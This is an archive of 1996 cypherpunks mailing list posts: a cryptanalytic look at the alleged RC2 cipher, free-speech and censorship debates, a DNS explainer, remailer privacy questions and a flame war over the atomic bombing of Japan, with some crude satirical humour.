a.   Whenever it's in the target block, it passes through the
encryption step with probability 0.5.  (This means that changing
this bit doesn't change the carry into the next higher bit.) This
happens once per round.

b.   Whenever it's in the source block, it fails to affect the
target block with probability 0.5.  This happens three times per
round.

Note the reasons for this.  The source block affects the target
block only through this function:  ((A&B)|((~A)&C)).  This function
looks somewhat complicated, but it's really just a bitwise IF-THEN
statement:  If bit A is on, then choose bit B, otherwise choose bit
C.  Assume that A, B, and C are random.  Now, imagine flipping A.
If you were choosing bit B before, now you're choosing bit C.  Since
they're both random, half the time, B=C, so there's no change.  On
the other hand, imagine flipping bit C.  About half the time, bit A
is a one, and so C has no effect on the output.

All of this gives us a total per-round probability of 2^{-4} (NOT
2^{-8}). Getting through 14 rounds with this characteristic thus
happens with probability 2^{-56}.  *IF* single-bit characteristics
are the best ones to use, I'm doing the calculations right, and
there aren't some improvements in splitting out and dealing with
several possible characteristics in the later rounds, then it looks
to me like straight differential attacks aren't going to be too
practical against alleged RC2, though they will be possible. The
trick is going to be detecting the right pairs reliably. (This
analysis is guaranteed to be worth at least what you paid me for it.
:-) )

If this really is RC2, I suspect the number of rounds needed was
determined by imagining flipping a bit, and then seeing what the
odds were that it wouldn't flip any other bits all the way through.
My guess is that a probability of 2^{-64} of this happening was
deemed acceptably low.

That takes care of diffusion--now how about confusion?  Has anyone
looked at this cipher with regard to linear attacks?  In general, it
seems like source-heavy UFNs can often be attacked by linear
attacks.  However, it's not clear to me how to build linear
characteristics that will make it through more than a few rounds of
alleged-RC2.  Linear characteristics that are spread across many
subblocks (i.e., partly in A and partly in B) seem to get messed up
quickly by the rotations.  However, just keeping a linear
characteristic in A doesn't seem to work too well, either--if the
bits in the other blocks are random, then the bits in our
characteristic will quickly become random, as well, because the
bit-selection function has balanced outputs.  Intuitively, I think
the problem here is that we're applying a three-bit to one-bit
balanced S-box here, and each output from this S-box has at least
one different input bit.  This seems to make it really hard to find
correlations between multiple S-box output bits and their
corresponding input bits that span more than one or two rounds.
Also, we have to deal with the carry-bits from addition, which make
things significantly harder.  Am I missing something?

There are some other plaintext patterns that will make it through a
single round, but I can't see any way to exploit them for more
rounds.  Anyone want to point something out to me?

The other interesting area is the key schedule.  Recall that phase
one of the key schedule in alleged-RC2 works by filling the leftmost
k bytes with the k bytes of key, and then using a byte-wide S-box to
expand this out to 128 bytes.  Phase two then works from the
opposite direction, taking the last t bits of the expanded key
buffer, and making the entire expanded key dependent only upon those
bytes.  As someone on cypherpunks pointed out, this seems to be
meant to make it possible to use the key schedule directly on user
passphrases, and then reduce the effective key length to t bits to
meet export control requirements.

In general, I don't think it's a good idea to use that key schedule
to hash long user passphrases, because the first few subkeys wind up
with some badly skewed bits. (This may or may not translate into an
attack, but there isn't any good reason for allowing it.)  If you
had (say) a 64-byte user passphrase, this would mean that the first
four rounds' subkeys were badly skewed in this way, and the next
four rounds' subkeys were probably not all that well-mixed.  As I
said, I don't see a specific attack based on this, but it seems like
a bad idea, since I might be able to plan out (for example)
differential characteristics that took advantage of the skewed
subkey bits.

If you're using the key schedule to hash passphrases, then it's
probably better that you use phase two as well, perhaps with bits =
256 or something similar.  If you limit user passphrases to
something reasonable, such as 64 characters, then this is probably
okay.  Has anyone else looked at this?  (Naturally, it would make
more sense to just hash the passphrase intelligently, and then use
the export control hack if you had to.)

Comments?

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com / kelsey@counterpane.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRP5P0Hx57Ag8goBAQF2FQP8DCxUvPqNly99t/KyRogWKkM5X0iZWHhq
MdQ5XEFWdyg26KMpwmPmFeNcgj3rpQiValSGGM3cTzAd2v35GQrKwPdRU/nmQW7B
hojJrYA1D0IuMxE7c0+tyqdjw6oFXrqiWYH816NKKlTSvAUzgst8hCyoVgpbNwkm
tbjAD93wsTk=
=uaz+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 4 Feb 1996 11:15:13 +0800
To: cypherpunks@toad.com
Subject: Re: free speach and the government
In-Reply-To: <199602040002.QAA11844@slack.lne.com>
Message-ID: <ek1qiD40w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Eric Murray <ericm@lne.com> writes:
> Stephan Mohr writes:
> >
> > Well, I feel that I agree with the people on the right of free speech for
> > i.e. the neo-nazi stuff or other political, ideological and/or religious
> > ideas. But there is still something that leaves me uneasy: imagine there
> > would be a way to easily make a powerful poison, easily applicated to
> > your town's water-reservoir, or a very easy way to build some strong
> > explosive device. etc. Actually, I think that stuff like this does exist
> > already.
> >
> > But the idea that one day I just put 'easy made deadly poison for millions'
> > into my webcrawler and whoop there it is on my screen or on the screen of a
> > other fool, doesn't sound to right to me. I would like things like this
> > to be better put aside and locked up.
>
> You can't put the genie back into the bottle.
> Once something is invented or described, the knowledge
> is out there.  Someone who wants to use that knowledge
> for "wrong" purposes can find it.

Either some information is being suppressed, or no information whatsoever is
being suppressed. Whether it's the knowledge how to made strong crypto, or how
to make the A-bomb, or now to make Sarin, or _Mein Kampf_, or uuencoded
pictures of naked kids, really doesn't matter. E.g., many people perceive the
dissemination of Nazi teachings to be as dangerous as the dissemination of a
Sarin recipe. One can't be "a little big pregnant".

I believe that any exception to unlimited free speech, be it libel, or
copyright violation, or child pornography, or Nazi propaganda, or Chinese
dissident materials, just isn't compatible with the cpunk agenda. No censorship
is acceptable. That's an absolute.

[...]
> In the US the media is by and large controlled by huge
> media conglomerates with a vested interest in maintaining
> the status quo and delivering up their audience to their
> advertisers in tidy packages.
>
> The government is along for the ride, being part and parcel
> of the same system.  They won't rest until net-speech is
> by and large controlled by huge media conglomerates all
> busy delivering up the net-public to advertisers in tidy
> packages... I'm not saying that there's a Black Heliocopters
> type conspiracy, or any other for that matter.  There doesn't
> have to be, there are huge political forces moving things
> this way.  So there might as well be a conspiracy, as the
> end effect on us is the same.

There's a widespread misconception that most journalists support freedom of
speech for non-journalists. I deal with journalists occasionally, and my
impression is that the attitude of some of them can be summarized as follows:
"I'm an important guy because I can say something that hundreds of thousands of
people will see/read; and I can libel another person and s/he won't be able to
respond". People with this attitude are very threatened by the Internet. I'm
not saying that all journalists are this way; I'm just pointing out that it's
foolish to assume that just because a person works in the media, s/he's in
favor of free speech, especially unlimited free speech.

> I think that any compromise with government censorship is a bad idea.
> All we'd do is give them a little more while on the way towards the
> inevitable.  If we don't give them all the censorship power they
> want they'd just take it anyhow.  Better to hold out as well as
> we can while we can.

>From the technology point of view, there's no difference between helping
Chinese dissidents circumvent their government's restrictions on the net,
and helping neo-Nazis in Germany and helping child pornographers in the
U.S. No one can determine which of the countless bits of information that
travel over the Internet every second are false, or harmful, or subversive,
or otherwise not worthy of transnmission.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 4 Feb 1996 09:11:13 +0800
To: vin@shore.net
Subject: Re: The FV Problem = A Press Problem
Message-ID: <01I0SE71ZF6SA0UTZ4@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"vin@shore.net"  1-FEB-1996 02:08:33.54

>Greg Broiles <gbroiles@darkwing.uoregon.edu> opined:

>We should, however, learn from what FV did right - they wrote software which
>(apparently) had or can have a real political effect. (It seems to have
>worked on Garfinkel, anyway). Cypherpunks write code? FV wrote code and got
>some attention for their otherwise unexciting message.  <snip>

        Now _that's_ a useful and on-target observation.
-------------
	Quite. To expand it: A. a program doesn't have to be new to the
technical community to make a difference, it just has to be new to the rest of
the world; B. publicity for programs makes a difference. If DigiCash had
come out with this program and had done the press release better than the FV
folks, I suspect we'd be cheering them on and the credit card types would be
doing worse - a good situation.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 4 Feb 1996 09:24:53 +0800
To: tcmay@got.net
Subject: Re: Imminent Death of Usenet Predicted
Message-ID: <01I0SEGNWJAYA0UTZ4@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	One thing that I'm worried about is InterNIC. As I understand it, it
is a central company that is in the business of receiving domain name
registrations, including the info on what that domain is connected to, and
sending it out to various nameservers. The nameservers then use this to route
some (not all, I do believe) traffic.
	This situation is a weak point. The government in whatever country
InterNIC's physical presence is in (the US, I believe) can put pressure on
it for "faciliating breakage of laws" or some such nonsense (for some material,
such as the sites that have crypto material, the espionage argument that it
is cooperating in limiting their ability to work might be what was used). It
is then forced to stop issuing domain names except to people the US govt wants
to get such. Nameservers in the US that use any other service to determine
domain names get arrested themselves, under likewise treatment.
	Now, this can all be fought in the courts and will likely be defeated..
but it would still cause some problems. Am I completely incorrect, or do the
programmers on here and elsewhere need to start coming up with a better way to
do things?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Sun, 4 Feb 1996 09:29:07 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [NOISE] Futplex makes the news!
In-Reply-To: <2.2.32.19960203135737.00740450@panix.com>
Message-ID: <199602040100.UAA03838@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell writes:
> Are *you* going to bring action against the school?  You could proceed
> administratively for free.

Unfortunately I'm in an awkward stage of my career. This is my 3rd year in
graduate school, with 2 or 3 more years to go. I have been happy with nearly
all aspects of my time studying at UMass. It would be a royal pain to try to
switch horses in midstream. And I very much want to finish my degree.

Meanwhile, I think I can safely say that from this point on I need to dot
all my i's and cross all my t's until I graduate from UMass. Suppose it
turned out that no-one wanted to sit on my thesis committee ?  I'm sure
anyone who's been through grad school can imagine other disturbing
hypothetical scenarios.

James Donald may characterize me as gutless. I think he would probably be 
correct to some extent.

Have I answered your question ?

Lewis Futplex McCarthy <lmccarth@cs.umass.edu>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 4 Feb 1996 10:10:01 +0800
To: cypherpunks@toad.com
Subject: Futplex makes the news! (fwd)
Message-ID: <199602040203.UAA06687@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 3 Feb 1996 19:01:18 -0800
> From: tcmay@got.net (Timothy C. May)
> Subject: Futplex makes the news!
> 
> (Many ISPs will drop a customer who creates any trouble.)
> 

I think most private sites have their future on the line. In my own case it
has taken just about every resource I have available to get online and stay
there. This is one aspect of supporting your local private ISP that many
folks don't understand very well. For some reason most folks have the
impression that if you can start and run a private site you must be making
money hand over foot. Just taint so.

> 
> --Tim May
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 4 Feb 1996 10:59:50 +0800
To: cypherpunks@toad.com
Subject: Re: [CONSPIRACYPUNKS] RC2 Source Code - Legal Warning from RSADSI
In-Reply-To: <199602032104.WAA02903@utopia.hacktic.nl>
Message-ID: <199602040230.VAA14636@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
>      It is becoming obvious to anyone with two brain cells to rub
> together that RC4 and now RC2 have been deliberately released by RSA
> Data Security.

Anyone with more than two brain cells might feel otherwise, however.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 4 Feb 1996 14:03:21 +0800
To: Stephan Mohr <cypherpunks@toad.com
Subject: Re: free speach and the government
Message-ID: <199602040548.VAA04878@shell1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:52 PM 2/3/96 +0000, Stephan Mohr wrote:
> But do
> you fighter[s] for free speech, in principle, think that nothing, really
> nothing, [should] be prevented [from] being published?

Yes:

> [...]
>
>I know, of course, that by accepting that there is something that
>shouldn't be available on the net, we would need something to decide what
>and how to ban. So I wonder what would be a more 'net'-like way of handling 
>this type of thing and how to prevent that some 'strong-armed' governments
>take the net over.

There is no "net-like" way of preventing people from communicating 
when one wishes to speak and another wishes to listen.  To attempt 
to achieve such a goal violates the principles that made the internet
possible, such as the "no settlements" rule.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 4 Feb 1996 14:06:14 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [NOISE] Futplex makes the news!
Message-ID: <199602040548.VAA04885@shell1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:00 PM 2/3/96 -0500, you wrote:
>
>James Donald may characterize me as gutless. I think he would probably be 
>correct to some extent.

You acted for liberty:  I failed to act:  How could I characterize you
as gutless?

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 4 Feb 1996 12:38:46 +0800
To: cypherpunks@toad.com
Subject: New sig, let me know what you think!
Message-ID: <ad39741804021004fe2d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Since Clinton is getting ready to sign the Exon Amendment/Communications
Decency Act/Telecom Bill, with some amazingly restrictive rules about what
kind of material can be sent over computers (especially if there's a chance
anyone under the age of 18 can see it), I have been worried about the
implications for my hobby. You see, I am also an amateur Biblical scholar,
and have been working on my "Modern Vernacular Translation."

For most of my messages involving speech, the CDA, censorship, etc., I plan
to include part of my translation as a kind of inspirational quote. Surely
Sen. Exon will not object to this material as "indecent"? After all, it's
the word of God.

I threw this together quickly, excerpting some online versions of the
Bible. Others could do the same thing, by quoting salacious material from
other sources. The letters of Thomas Jefferson, for example? Or
Congressional testimony itself, maybe stuff from the Meese Commission
reports? Juicy stuff there. Is the CDA going to make quoting from the
Congressional Record a crime? (I suppose it ought to be....)

--Tim May

[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and do em right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should do him." So the two daughters got him drunk and
did him all that night. Sure enough, Dad got em pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he whacked off first....Remember, it's
not a good idea to have sex with your sister, your brother, your parents,
your pet dog, or the farm animals. [excerpts from the Old Testament, Modern
Vernacular Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m.purcell@navy.gov.au (LEUT Mark Purcell)
Date: Mon, 5 Feb 1996 12:43:03 +0800
Subject: Re: Windows PGP mail reader
In-Reply-To: <4eaksb$6i9@recepsen.aa.msen.com>
Message-ID: <4f0llo$mln@soap.news.pipex.net>
MIME-Version: 1.0
Content-Type: text/plain


In article <4eaksb$6i9@recepsen.aa.msen.com>, jims@conch.aa.msen.com says...
>
>Hi.  Can anyone recommend a Windows based email/POP3 reader that can decrypt
>content?  Please reply  via email:


Have a look at Pegasus Mail.  It handles PGP very nicely with a recent
addition. by John Navas, both are free:  
http://users.aimnet.com/~jnavas/winpmail.htm

Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 4 Feb 1996 11:22:26 +0800
To: lmccarth@cs.umass.edu
Subject: Re: [NOISE] Futplex makes the news!
Message-ID: <199602040257.VAA20379@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Lewis,

   Take heart and wisdom from this experience of being caught
   up in public events. Being used, and abused, by
   institutions for their impersonal, otherwordly, purposes.

   Public disputes are like that, when your personal
   advocacies are distorted, twisted back in unexpected forms 
   in assault on your seemingly impregnable position.

   Well done for this foray. But be prepared for shrewd
   opposition again as you continue behaving responsibly
   to challenge the day's short-sighted conventional wisdom.

   I think you shouldn't worry about thesis advisors, the
   thoughtful ones will understand your action and its
   underlying principles. They may be less daring and more
   cautious than you -- such is the burden of maturity -- but
   I suspect they will admire your audacity, and remember when
   they did the same in younger days when public disputes
   seemed more alluring and tractable -- as I do.

   Thanks much.

   John










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Sun, 4 Feb 1996 05:26:50 +0800
To: cypherpunks@toad.com
Subject: [CONSPIRACYPUNKS] RC2 Source Code - Legal Warning from RSADSI
Message-ID: <199602032104.WAA02903@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


     It is becoming obvious to anyone with two brain cells to rub
together that RC4 and now RC2 have been deliberately released by RSA
Data Security.

     Consider that neither of these ciphers would be used in any
freely available software systems if licensing fees had to be paid to
RSA.  Now that the algorithms are public knowledge, many developers
will include them in their products if for no other reason than to
tweak RSA's nose.

     The warning notices and claims of dire consequences from RSA
are clearly designed to spread FUD among deep-pocket users of such
products.  Rather than risk any legal exposure, medium and large
companies who wish to use products containing RC2 and RC4 will obtain
licenses from RSA.  RSA has traded the entirety of a small pie for a
significant portion of a much larger pastry.

     Quite brilliant marketing when one thinks about it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 4 Feb 1996 14:30:20 +0800
To: Jordan Hayes <cypherpunks@toad.com
Subject: Re: Sometimes ya just gotta nuke em
Message-ID: <199602040611.WAA18584@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


http://www2.ari.net/home/bsabath/950711.html

At 12:25 PM 2/3/96 -0800, Jordan Hayes wrote:
>Sorry to inject a little scholarly research on this topic, but I
>would urge those of you who are interested in how this mythology
>was created and disseminated to do an AltaVista serach for Alperovitz;
>he's potentially the leading scholar on this subject.  I've read
>his book, and Tim probably ought to as well ...

SCHOLARLY RESEARCH!!!!

You do not know shit from beans:  Alperovitz is no more a scholar 
than Zundel is:  He is a historical revisionist 
who lies even more crudely than the holocaust revisionists.

It is clear that in the opinion of the high command, the decision to 
surrender after they were nuked was a dramatic and radical change of 
position.  Alperovitz says otherwise, thus he is either grotesquely 
ignorant or, more likely simply dishonest.


Alperovitz writes: 
        The use of the atomic bomb, most experts now believe, was totally
        unnecessary. Even people who support the decision for various 
        reasons acknowledge that almost certainly the Japanese would have
        surrendered before the initial invasion planned for November. 
        The U.S. Strategic Bombing Survey stated that officially in 1946. 

        We found a top-secret War Department study that said when the 
        Russians came in, which was August 8, the war would have ended 
        anyway. The invasion of Honshu, the main island, was not 

        [And so on and so forth]

After the second nuclear attack, the Japanese high command had a
meeting with the emperor:  They heard testimony on the effects of
atomic bombs.  About half wanted to surrender, about half argued that
Japan should die gloriously:  They were unaware that the US had just
used up almost its entire nuclear arsenal.  They expected that surrender
would be followed by the same kind of reign of terror, rape, brutal
degradation, and mass murder, that they inflicted on the people that
they conquered. They expected that failure to surrender would result
in continued nuclear bombardment at about the same rate.  (Both
beliefs were incorrect.)

The Emperor *at that meeting* made the decision to surrender, shocking
a large part of the high command, and then made a speech on radio
announcing the surrender, stating as reason for the surrender that if
they did not surrender, Japan would be utterly destroyed by nuclear
weapons.

Seeing as they were still debating the issue *after* two nuclear
weapons had landed on them, it seems reasonable to believe that
without atomic weapons, it would have been necessary to fight from
house to house from one end of Japan to the other.


When Hirohito ordered surrender in response to atomic bombing, the high 
command attempted to violently overthrow him, and when they failed, many
in the high command committed suicide.





>
>If you read nothing else on this topic, I urge you to check out
>an interview with him at http://www2.ari.net/home/bsabath/950711.html
>
>#endif
>
>/jordan
>
>
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 4 Feb 1996 14:34:39 +0800
To: John Banes (Wasser) <cypherpunks@toad.com
Subject: Re: Microsoft's CryptoAPI - thoughts?
Message-ID: <199602040611.WAA18599@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:11 AM 2/3/96 TZ, Wasser wrote:
> I have "standardized" the PS files on the MS website, so there should 
> be no more problems. Sorry for the inconvenience.

Thank you, but it would be even better to webify them.

I have webified them (http://www.jim.com/jamesd/mscryptoapi.html), 
but I am sure most people would prefer an official copy:

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 4 Feb 1996 14:54:40 +0800
To: cypherpunks@toad.com
Subject: Re: Sometines ya just gotta nuke em-and nuke em again
Message-ID: <199602040622.WAA07274@shell1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:39 PM 2/3/96 -0800, paralax@alpha.c2.org wrote:
>Mr. Hayes MAY have used a condescending tone but you have exposed your
>racist roots again.  First you embarass yourself with you lack of knowledge,

Paralax does not know shit from beans.  He presumably imagines that Tim is
"embarrassed" because Tim's knowledge of the historical facts differs from
those facts dreamed up by the usual crew of apologists for totalitarian terror.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 4 Feb 1996 14:48:58 +0800
To: cypherpunks@toad.com
Subject: Re: C2 and the Worst Case
Message-ID: <199602040628.WAA07276@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer <sameer@c2.org> wrote:

> > The question is, how much would they get? How much information about c2
> > users would fall into the wrong hands?
>
>	The only information we have is the information you give
> us. If you don't give us your name, we don't have your name. If you
> don't give us the site you're coming from, we don't have the sit eyour
> coming from. They can't get information out of us that we don't
> have. That's our guiding principle, in terms of the privacy against
> government-level attack.

Are you saying that when someone with an anonymous mailbox on c2.org
retrieves his/her mail via a POP3 connection, no log is made of
the originating IP address?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Gimon <gimonca@skypoint.com>
Date: Sun, 4 Feb 1996 13:05:42 +0800
To: cypherpunks@toad.com
Subject: Re: New sig, let me know what you think!
In-Reply-To: <ad39741804021004fe2d@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960203223920.23461A-100000@mirage>
MIME-Version: 1.0
Content-Type: text/plain



Packwood Diaries?
Gingrich's novel?
Screenplay for Gramm's porno movie?
Anything involving a Kennedy?

 ***********************************************************************
        --The Interview--             | gimonca@skypoint.com
 George Clinton: "Suck on my soul,    | Minneapolis MN USA
 and I will lick your funky emotions!"| http://www.skypoint.com/~gimonca
 Dave Letterman: "Yuck!!"             | A lean, mean meme machine.
 ***********************************************************************

On Sat, 3 Feb 1996, Timothy C. May wrote:

> 
> Others could do the same thing, by quoting salacious material from
> other sources. The letters of Thomas Jefferson, for example? Or
> Congressional testimony itself, maybe stuff from the Meese Commission
> reports? Juicy stuff there. Is the CDA going to make quoting from the
> Congressional Record a crime? (I suppose it ought to be....)
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Mohr <stephan.mohr@uni-tuebingen.de>
Date: Sun, 4 Feb 1996 07:09:15 +0800
To: cypherpunks@toad.com
Subject: free speach and the government
Message-ID: <2.2.16.19960203234059.2eb7ed1c@mailserv.uni-tuebingen.de>
MIME-Version: 1.0
Content-Type: text/plain


Well, I feel that I agree with the people on the right of free speech for
i.e. the neo-nazi stuff or other political, ideological and/or religious
ideas. But there is still something that leaves me uneasy: imagine there
would be a way to easily make a powerful poison, easily applicated to
your town's water-reservoir, or a very easy way to build some strong
explosive device. etc. Actually, I think that stuff like this does exist
already.

But the idea that one day I just put 'easy made deadly poison for millions'
into my webcrawler and whoop there it is on my screen or on the screen of any
other fool, doesn't sound to right to me. I would like things like this
to be better put aside and locked up.

Well, maybe my imagination isn't strong enough to make my point. But do
you fighter for free speech, in principle, think that nothing, really
nothing, shouldn't be prevented of being published? And by being
published, I mean published in the net, not at loompanics (who knows
loompanics?).

I know, of course, that by accepting that there is something that
shouldn't be available on the net, we would need something to decide what
and how to ban. So I wonder what would be a more 'net'-like way of handling 
this type of thing and how to prevent that some 'strong-armed' governments
take the net over.

I do not see tokay's governments being prepared for the net (at least not
the German one). But I see them trying to put the 'old' laws onto the net.
Not because they are mean, but because they don't know any better. So, I
think it would be nice to have something to offer to them. I do not think though
that they will accept the totally right of free speech (yet). 

There is something that is closely related to the right of free speech but
not the same and that is the right of privacy. And I think there is a big
danger of the issue of free (public) speech been taken over to the right of
privacy. Governments may, by arguing to control the public net, start to
prohibit the use of strong cryptography. It seems important to me to
separate this two issues. Maybe it will be necessary to agree to some kind
of (hopefully self organized) control of the public net. But it is totally
unacceptable to allow whatever organization to look into someone's private life.

Comments and hints to information on these topics very much welcome

Stephan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: avatar@mindspring.com
Date: Sun, 4 Feb 1996 12:37:07 +0800
To: cypherpunks@toad.com
Subject: Searching for the best
Message-ID: <199602040420.XAA23885@borg.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi, Folks

        I am looking for the best file encryption program and the best file
wiping program.
PC compatible, perferably Win 95 compatible.
                                                                        Thanx
Charles Donald Smith Jr.
582 Clifton Rd. N.E.
Atlanta, Ga. 30307-1787
(404)-378-7282

REPUBLICAN; smaller government, less taxes, richer people, and proud children!! 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sun, 4 Feb 1996 13:37:07 +0800
To: cypherpunks@toad.com
Subject: Re: New sig, let me know what you think!
Message-ID: <9602040507.AA20267@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Tim May signature is truly a gem!


>[This Bible excerpt awaiting review under the Communications Decency Act]
>And then Lot said, "I have some mighty fine young virgin daughters. Why
>don't you boys just come on in and do em right here in my house - I'll just
>watch!"....Later, up in the mountains, the younger daughter said. "Dad's
>getting old. I say we should do him." So the two daughters got him drunk and
>did him all that night. Sure enough, Dad got em pregnant....Onan really
>hated the idea of doing his brother's wife and getting her pregnant while
>his brother got all the credit, so he whacked off first....Remember, it's
>not a good idea to have sex with your sister, your brother, your parents,
>your pet dog, or the farm animals. [excerpts from the Old Testament, Modern
>Vernacular Translation, TCM, 1996]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Sun, 4 Feb 1996 16:14:23 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Imminent Death of Usenet Predicted
Message-ID: <199602040812.AAA27504@scylla.communities.com>
MIME-Version: 1.0
Content-Type: text/plain


>	One thing that I'm worried about is InterNIC. As I understand it, it
>is a central company that is in the business of receiving domain name
>registrations, including the info on what that domain is connected to, and
>sending it out to various nameservers. The nameservers then use this to route
>some (not all, I do believe) traffic.

Close, but not quite.  The role that the InterNIC serves is to register 
domains
and to maintain the top-level mappings.  It is from InterNIC that the 
root-level 
nameservers load info regarding which domains are served by which 
nameservers.
The way this process works from any particular users point of view is as
follows:

1) You request that the host name www.foo.bar be resolved to an IP 
address.
2) Your TCP/IP software checks its local cache (if any) to see if it 
already
   has the requested information and if so it returns it without doing a
   lookup [there are timeouts and other bits involved but this is the 
simple version]
3) If a lookup is necessary your TCP/IP software digs up a pre-defined 
name/number
   for who is should ask.  This is the info that you enter into a 
resolv.conf file
   in unix, a MacTCP DNS setting, etc.  It is usually the nameserver for 
your
   internet service provider or a local nameserver for your network.  
Once the
   resolver knows who to ask it formats a query and sends it off.
4) This nameserver checks its cache to see if it already has the info and 
if not
   it forwards the request to another nameserver.  Eventually the request 
hits
   a root server; the root servers then check the domain name against 
their tables
   (the ones it loaded up from the NIC) and forward the request to the 
appropriate
   nameserver.
5) Eventually the request is forwarded to a nameserver which is able to 
give an
   authortative answer for this domain and the result is sent back to the 
original
   requester.

At any point in this chain it is possible for someone to decide who will 
give the
authoratative answer for this domain.  It is possible for you, the 
requester, to
decide for yourself who will be asked.  All you need to do is to add 
whatever
nameserver you trust early into the query chain and that server will be 
asked first
and only if it does not answer authoratatively will the regular 
nameservers be
asked to resolve the request.

The DNS system represents to oldest digital reputation system I know ot.  
It is _all_ 
about trust; if you think that someone is giving out bogus information or 
you want
your answers to come from someone else it is trivial to change the way 
your nameservice
is configured so that lookups happen in the manner that you want.  No one 
can control
how names are resolved into numbers unless someone else grants them that 
power.  There
